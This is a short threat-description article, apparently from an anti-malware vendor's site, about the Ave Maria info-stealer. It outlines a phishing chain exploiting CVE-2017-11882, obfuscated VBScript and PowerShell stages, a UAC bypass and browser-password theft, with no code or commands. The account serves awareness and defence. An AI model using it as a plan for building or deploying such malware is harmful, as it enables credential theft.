Ave Maria
Ave Maria is the name of a relatively new piece of malware that was first seen in action in January 2019 when it was used against Italian-based companies that deal with business in the oil & gas sector. The attack was carried out with the use of a phishing email that aimed to distribute malicious Microsoft Office files to company employees – the files in question would execute a script that exploits the CVE-2017-11882 vulnerability, which would allow the remote attacker to download and launch an executable file on the compromised system.
But what is Ave Maria’s purpose? This malware is meant to serve as an info stealer that can extract sensitive data from infected computers silently. It has the ability to collect saved Web browser passwords, and it even has the toolkit necessary to decrypt the password data that Mozilla Firefox stores. Malware researchers identified another attack campaign that involves the Ave Maria recently. However, this time its authors have opted out of using an AutoIT script to deploy the payload and, instead, they use a multi-stage attack technique that may help their malware avoid the detection methods used by some anti-virus software.
The recent Ave Maria attack is once again executed with phishing emails that contain a malevolent file attachment. However, this time the Microsoft Office documents propagated by the attackers execute an obfuscated VBScript that triggers a series of PowerShell commands that are meant to initialize the first stage of the attack. The PowerShell script fetches data from a popular text storage site and then deobfuscated it to proceed with the next stages that introduce Ave Maria, a Trojan downloader and a variant of RevengeRAT.
Once the Ave Maria info stealer is initialized, it may exploit a vulnerability in the PkgMgr (Windows Component) that allows it to bypass User Account Controls (UAC). This would make it possible for the attackers to fetch sensitive information without triggering UAC prompts, and then transfer it to their server. The Ave Maria stealer looks for installed email clients it can collect information from, as well as passwords saved in Firefox.
Protecting a computer from the Ave Maria and similar threats can be done with the use of a sophisticated anti-malware utility.
Leave a Reply
Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter . If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.